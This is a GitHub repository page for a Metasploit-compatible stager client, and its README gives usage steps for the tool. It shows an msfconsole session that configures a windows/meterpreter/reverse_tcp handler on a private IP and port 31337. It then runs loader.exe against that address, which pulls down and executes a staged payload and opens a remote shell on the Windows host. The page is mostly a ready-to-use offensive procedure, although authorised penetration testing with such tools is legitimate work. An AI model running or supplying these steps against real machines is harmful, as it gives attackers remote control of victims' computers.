Skip to content
Branch: master
Go to file
Code

Latest commit

rsmudge committed da611f3 Feb 4, 2013
Make readme more readable

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
src
Sep 13, 2012
Sep 13, 2012

README.md

A quick stager client compatible with the Metasploit Framework

Reference:

  1. http://mail.metasploit.com/pipermail/framework/2012-September/008660.html
  2. http://mail.metasploit.com/pipermail/framework/2012-September/008664.html

Use:

  1. Start a multi/handler with your favorite windows reverse_tcp payload
  2. Run: loader.exe [host] [port]

How to compile:

  1. Install mingw
  2. Edit build.bat if mingw is installed somewhere other than c:\mingw
  3. run build.bat

ToDo:

  1. 64-bit compatability (see message #2)
  2. get a Windows build environment with make

How to use:

msf > use exploit/multi/handler 
msf  exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf  exploit(handler) > set LPORT 31337
LPORT => 31337
msf  exploit(handler) > set LHOST 192.168.95.241
LHOST => 192.168.95.241
msf  exploit(handler) > exploit -j

loader.exe 192.168.95.241 31337

About

A client compatible with Metasploit's staging protocol

Resources

Releases

No releases published

Languages

You can’t perform that action at this time.